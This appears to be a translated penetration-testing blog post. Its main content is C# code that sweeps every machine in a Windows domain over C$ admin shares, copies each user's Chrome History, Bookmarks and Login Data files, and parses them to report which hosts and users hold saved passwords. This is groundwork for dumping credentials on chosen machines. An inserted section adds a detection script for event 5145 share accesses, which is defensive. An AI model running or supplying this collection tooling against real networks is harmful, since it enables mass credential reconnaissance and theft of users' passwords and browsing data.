The previous post covered batch collection of files across the domain. In some scenarios we need access to one particular machine, but it may only expose ports such as 80 or 22, so the usual ways of getting a shell do not apply, while some IT staff member's personal PC may hold a password list. In other cases all we need is the admin backend of a particular web application. In an intranet with thousands of machines, going through browser passwords one machine at a time is very tedious, so instead we can batch-parse, for every machine in the domain and every user on it, Chrome's bookmarks, history and whether passwords are saved, write that out as text, and then dump passwords only on the machine that matters. This saves a lot of time.
0x01 Collecting the Chrome files
Chrome keeps its profile files under
`C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default`
- Bookmarks: bookmarks
- History: browsing history
- Login Data: saved-password records
We use the same approach as the earlier domain file collection, so I will not repeat it here. Create machine.txt and read the machines from it line by line.
Get the current path and create the TargetChromeFiles directory:
```csharp
using System.IO;

string currentpath = Directory.GetCurrentDirectory();
string DesktopFiles = currentpath + "\\TargetChromeFiles";
```
Enumerate the users directory; if `C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default` exists (checked for every user profile), create a folder named after the machine and a subfolder named after the user:
```csharp
// "machine" is the current line read from machine.txt
string userpath = @"\\" + machine + @"\c$\users";
var user_list = Directory.EnumerateDirectories(userpath);
foreach (string user in user_list)
{
    string ChromePath = user + "\\AppData\\Local\\Google\\Chrome\\User Data\\Default";
    // last path segment, e.g. "Administrator" (the original used a custom substring() helper)
    string username = Path.GetFileName(user);
    if (Directory.Exists(ChromePath))
    {
        string MachineFolder = DesktopFiles + "\\" + machine;
        Directory.CreateDirectory(MachineFolder);
        string UserFolder = MachineFolder + "\\" + username;
        Directory.CreateDirectory(UserFolder);
        // the History / Login Data / Bookmarks copy snippets below belong here
    }
}
```
Fetch the History file for that machine and user:
```csharp
string historyPath = ChromePath + "\\History";
if (File.Exists(historyPath))
{
    string historyfile = UserFolder + "\\History";
    StreamWriter history_file = File.CreateText(historyfile);
    history_file.Close();
    bool isrewrite = true;   // overwrite an existing copy
    File.Copy(historyPath, historyfile, isrewrite);
}
```
If it exists, the local History file is created and the remote one copied over it; the bookmarks and the saved-password store are handled the same way:
```csharp
string loginPath = ChromePath + "\\Login Data";
if (File.Exists(loginPath))
{
    string loginfile = UserFolder + "\\Login Data";
    StreamWriter login_file = File.CreateText(loginfile);
    login_file.Close();
    bool isrewrite = true;
    File.Copy(loginPath, loginfile, isrewrite);
}

string BookPath = ChromePath + "\\Bookmarks";
if (File.Exists(BookPath))
{
    string bookfile = UserFolder + "\\Bookmarks";
    StreamWriter book_file = File.CreateText(bookfile);
    book_file.Close();
    bool isrewrite = true;
    File.Copy(BookPath, bookfile, isrewrite);
}
```
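From the defender's side, the collection above leaves a very recognisable trace: one source reading `Login Data`, `History` and `Bookmarks` from user profiles through the `C$` share on many hosts. The following is an added detection example, not part of the original post, that runs over constructed records shaped like Windows Security event 5145 (Detailed File Share auditing must be enabled for those to exist); hostnames, IPs and user names are made up.

```python
import re
from collections import defaultdict

# Constructed records shaped like Windows Security event 5145 ("Audit Detailed File Share").
# ShareName \\*\C$ is the admin share the collector walks; RelativeTargetName is the path
# below the share root. All values are invented for this example.
EVENTS = [
    {"Computer": "PC01", "EventID": 5145, "SubjectUserName": "svc-backup", "IpAddress": "10.0.0.5",
     "ShareName": r"\\*\C$", "RelativeTargetName":
     r"Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"Computer": "PC01", "EventID": 5145, "SubjectUserName": "svc-backup", "IpAddress": "10.0.0.5",
     "ShareName": r"\\*\C$", "RelativeTargetName":
     r"Users\alice\AppData\Local\Google\Chrome\User Data\Default\History"},
    {"Computer": "PC02", "EventID": 5145, "SubjectUserName": "svc-backup", "IpAddress": "10.0.0.5",
     "ShareName": r"\\*\C$", "RelativeTargetName":
     r"Users\bob\AppData\Local\Google\Chrome\User Data\Profile 1\Bookmarks"},
    {"Computer": "PC03", "EventID": 5145, "SubjectUserName": "jdoe", "IpAddress": "10.0.0.9",
     "ShareName": r"\\*\Shared", "RelativeTargetName": r"reports\q1.xlsx"},
    {"Computer": "PC03", "EventID": 5145, "SubjectUserName": "helpdesk", "IpAddress": "10.0.0.7",
     "ShareName": r"\\*\C$", "RelativeTargetName": r"Windows\Temp\install.log"},
]

# The three Chrome profile files the collector copies, under any profile folder (Default, Profile 1, ...)
ARTIFACT_RE = re.compile(
    r"^users\\([^\\]+)\\appdata\\local\\google\\chrome\\user data\\[^\\]+\\"
    r"(login data|history|bookmarks)$", re.IGNORECASE)

def chrome_artifact_access(event):
    """Return (profile_owner, artifact) when a 5145 event reads a Chrome profile file
    through an administrative share (share name ending in $), otherwise None."""
    if event.get("EventID") != 5145 or not event.get("ShareName", "").endswith("$"):
        return None
    m = ARTIFACT_RE.match(event.get("RelativeTargetName", ""))
    return (m.group(1), m.group(2)) if m else None

def sweep_sources(events, min_hosts=2):
    """Fan-out check: a single source IP touching Chrome profiles on min_hosts or more
    computers is the signature of the batch collector described above."""
    per_source = defaultdict(set)
    for ev in events:
        hit = chrome_artifact_access(ev)
        if hit:
            per_source[ev["IpAddress"]].add((ev["Computer"], *hit))
    return {ip: sorted(touched) for ip, touched in per_source.items()
            if len({host for host, _, _ in touched}) >= min_hosts}

if __name__ == "__main__":
    for ip, touched in sweep_sources(EVENTS).items():
        print(ip, "read Chrome profile files on", len({h for h, _, _ in touched}), "hosts:", touched)
```

A single access to one profile is normal admin activity and is deliberately not flagged; the threshold is what separates the sweep from a one-off.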
Result of the dump:
Login Data
is stored as SQLite,
so we need to batch-parse every file under the local TargetChromeFiles
directory into text form and write the results to the local output_TargetChromeInfos
directory.
First create that directory:
```csharp
using System;
using System.Data;
using System.Data.SQLite;
using System.IO;

string currentpath = Directory.GetCurrentDirectory();
string getchromeinfopath = currentpath + "\\output_TargetChromeInfos";
Directory.CreateDirectory(getchromeinfopath);
```
Enumerate every machine under the TargetChromeFiles
directory and create the corresponding machine directory:
```csharp
string ChromeFilesPath = currentpath + "\\TargetChromeFiles";
if (Directory.Exists(ChromeFilesPath))
{
    Console.ForegroundColor = ConsoleColor.Yellow;
    Console.WriteLine("[*]Parsing Chrome browser information");
    Console.ForegroundColor = ConsoleColor.White;
    var machine_list = Directory.EnumerateDirectories(ChromeFilesPath);
    foreach (string machine in machine_list)
    {
        Console.ForegroundColor = ConsoleColor.Yellow;
        string out_machine_info = Path.GetFileName(machine); // last path segment (machine name)
        Console.WriteLine("[*]" + out_machine_info);
        Console.ForegroundColor = ConsoleColor.White;
        // create the local machine folder
        string getmachinepath = getchromeinfopath + "\\" + out_machine_info;
        Directory.CreateDirectory(getmachinepath);
```
Then create the user directories:
```csharp
        // inside the foreach over machines above
        var user_list = Directory.EnumerateDirectories(machine);
        foreach (string user in user_list)
        {
            Console.ForegroundColor = ConsoleColor.Yellow;
            string out_user_info = Path.GetFileName(user); // user name
            Console.WriteLine(" " + out_user_info);
            Console.ForegroundColor = ConsoleColor.White;
            string getuserpath = getmachinepath + "\\" + out_user_info;
            Directory.CreateDirectory(getuserpath);
```
Bookmarks are JSON, so I did not process them at all; the content is written straight into the Bookmarks file in the output directory.
```csharp
            // inside the foreach over users above
            string book_path = user + "\\Bookmarks";
            if (File.Exists(book_path))
            {
                string getbookpath = getuserpath + "\\Bookmarks";
                StreamWriter bookmark = File.CreateText(getbookpath);
                bookmark.Close();
                File.Copy(book_path, getbookpath, true);
                Console.ForegroundColor = ConsoleColor.Green;
                Console.WriteLine(" [*]bookmarks parse success");
                Console.ForegroundColor = ConsoleColor.White;
            }
            else
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine(" [-]bookmarks not found");
                Console.ForegroundColor = ConsoleColor.White;
            }
```
If you want it to look nicer, the following code tidies the output up:
```python
import json

# Path of the Bookmarks file; adjust to the profile you are inspecting
BOOKMARKS = 'C:/Users/Administrator/AppData/Local/Google/Chrome/User Data/Default/Bookmarks'

def walk(node):
    """Recursively yield (name, url) for every bookmark in Chrome's JSON tree."""
    if node.get('type') == 'url':
        yield node.get('name', ''), node.get('url', '')
    for child in node.get('children', []):
        yield from walk(child)

with open(BOOKMARKS, encoding='utf-8') as f:
    roots = json.load(f)['roots']

for root in roots.values():          # bookmark_bar, other, synced
    if isinstance(root, dict):       # skip non-folder entries such as version strings
        for name, url in walk(root):
            print(name + '\t' + url)
```
Looking at the history file,
we pull out just the fields we want:
```csharp
            // inside the foreach over users above
            string History_path = user + "\\History";
            if (File.Exists(History_path))
            {
                string gethistorypath = getuserpath + "\\History.txt";
                StreamWriter history = File.CreateText(gethistorypath);
                history.Close();
                SQLiteConnection connect = new SQLiteConnection(@"Data Source=" + History_path);
                connect.Open();
                SQLiteCommand fcmd = connect.CreateCommand();
                fcmd.CommandText = @"select * from urls";
                fcmd.CommandType = CommandType.Text;
                SQLiteDataReader r = fcmd.ExecuteReader();
                string HistoryHostof = "host:" + out_machine_info + "\r\n";
                string HistoryMemberof = "user:" + out_user_info + "\r\n\r\n";
                File.AppendAllText(gethistorypath, HistoryHostof);
                File.AppendAllText(gethistorypath, HistoryMemberof);
                while (r.Read())
                {
                    // "as string ?? """ avoids an InvalidCastException on a NULL title
                    string title = r["title"] as string ?? "";
                    string out_title = "title:" + title + "\r\n";

                    string url = r["url"] as string ?? "";
                    string out_url = "url:" + url + "\r\n\r\n";
                    File.AppendAllText(gethistorypath, out_title);
                    File.AppendAllText(gethistorypath, out_url);
                }
                connect.Close();
                Console.ForegroundColor = ConsoleColor.Green;
                Console.WriteLine(" [*]history parse success");
                Console.ForegroundColor = ConsoleColor.White;
            }
            else
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine(" [-]history not found");
                Console.ForegroundColor = ConsoleColor.White;
            }
```
I will not go into using SQLite from C# here; there is plenty of sample code and tutorials online.
Finally, the saved-password records:
```csharp
            // inside the foreach over users above
            string LoginData_path = user + "\\Login Data";
            if (File.Exists(LoginData_path))
            {
                string getloginpath = getuserpath + "\\Login Data.txt";
                StreamWriter login = File.CreateText(getloginpath);
                login.Close();
                SQLiteConnection connect = new SQLiteConnection(@"Data Source=" + LoginData_path);
                connect.Open();
                SQLiteCommand fcmd = connect.CreateCommand();
                fcmd.CommandText = @"select * from logins";
                fcmd.CommandType = CommandType.Text;
                SQLiteDataReader r = fcmd.ExecuteReader();
                string HistoryHostof = "host:" + out_machine_info + "\r\n";
                string HistoryMemberof = "user:" + out_user_info + "\r\n\r\n";
                File.AppendAllText(getloginpath, HistoryHostof);
                File.AppendAllText(getloginpath, HistoryMemberof);
                while (r.Read())
                {
                    string origin_url = r["origin_url"] as string ?? "";
                    string out_origin_url = "origin_url:" + origin_url + "\r\n";

                    string action_url = r["action_url"] as string ?? "";
                    string out_action_url = "action_url:" + action_url + "\r\n";

                    // 1 = the user chose "never save" for this site, 0 = a password is saved
                    Int64 blacklisted_by_user = (Int64)r["blacklisted_by_user"];
                    string out_blacklisted_by_user = "blacklisted_by_user:" + blacklisted_by_user + "\r\n";

                    File.AppendAllText(getloginpath, out_origin_url);
                    File.AppendAllText(getloginpath, out_action_url);
                    File.AppendAllText(getloginpath, out_blacklisted_by_user);
                }
                connect.Close();
                Console.ForegroundColor = ConsoleColor.Green;
                Console.WriteLine(" [*]login data parse success");
                Console.ForegroundColor = ConsoleColor.White;
            }
            else
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine(" [-]login data not found");
                Console.ForegroundColor = ConsoleColor.White;
            }
        } // end foreach user
    } // end foreach machine
} // end if (Directory.Exists(ChromeFilesPath))
```
When blacklisted_by_user
is 1, the user has told Chrome never to save a password for that site; otherwise a password is saved there. Note that the password_value column itself is not read in this pass: on Windows Chrome stores it as an encrypted blob, so this step only tells you which machines and users have saved credentials.
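To make the history and Login Data report logic above reproducible offline, here is an added example (not code from the original post) that builds a constructed SQLite stand-in for the two tables, then produces the same text layout as the C# while handling NULL titles and empty password blobs, which a plain cast would not. The schemas are trimmed to the columns the report uses; all rows are invented.

```python
import sqlite3

def build_sample_db():
    """Constructed stand-in for a copied History + Login Data pair. One in-memory DB
    holds both tables here; real Chrome keeps them in two separate files."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE urls(id INTEGER PRIMARY KEY, url TEXT, title TEXT);
        CREATE TABLE logins(origin_url TEXT, action_url TEXT, username_value TEXT,
                            password_value BLOB, blacklisted_by_user INTEGER);
        INSERT INTO urls(url, title) VALUES
          ('https://intranet.example/admin/login', 'Admin Console'),
          ('https://wiki.example/', NULL);
        INSERT INTO logins VALUES
          ('https://intranet.example/admin/login', 'https://intranet.example/admin/auth',
           'jdoe', X'76313000', 0),
          ('https://mail.example/', 'https://mail.example/login', '', X'', 1);
    """)
    return con

def history_report(con, host, user):
    """Same layout as the C# History.txt; a NULL title becomes an empty string
    instead of raising, as a (string) cast on DBNull would."""
    lines = [f"host:{host}", f"user:{user}", ""]
    for url, title in con.execute("SELECT url, title FROM urls"):
        lines += [f"title:{title or ''}", f"url:{url}", ""]
    return "\n".join(lines)

def login_report(con, host, user):
    """Same layout as the C# Login Data.txt. blacklisted_by_user == 1 means the user
    chose 'never save' for that site. password_value is an encrypted blob on Windows,
    so only its length is recorded, never its content."""
    lines = [f"host:{host}", f"user:{user}", ""]
    rows = con.execute("SELECT origin_url, action_url, blacklisted_by_user, "
                       "length(password_value) FROM logins")
    for origin, action, blacklisted, pw_len in rows:
        status = "never-save" if blacklisted == 1 else "saved"
        lines += [f"origin_url:{origin}", f"action_url:{action}",
                  f"blacklisted_by_user:{blacklisted} ({status})",
                  f"encrypted_password_bytes:{pw_len or 0}", ""]
    return "\n".join(lines)

def saved_login_count(con):
    """Number of sites for which a credential is actually stored."""
    return con.execute("SELECT count(*) FROM logins WHERE blacklisted_by_user = 0").fetchone()[0]
```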
The test environment here was my own machine; after extensive testing in authorized engagements, I have found no problems so far.
Final result: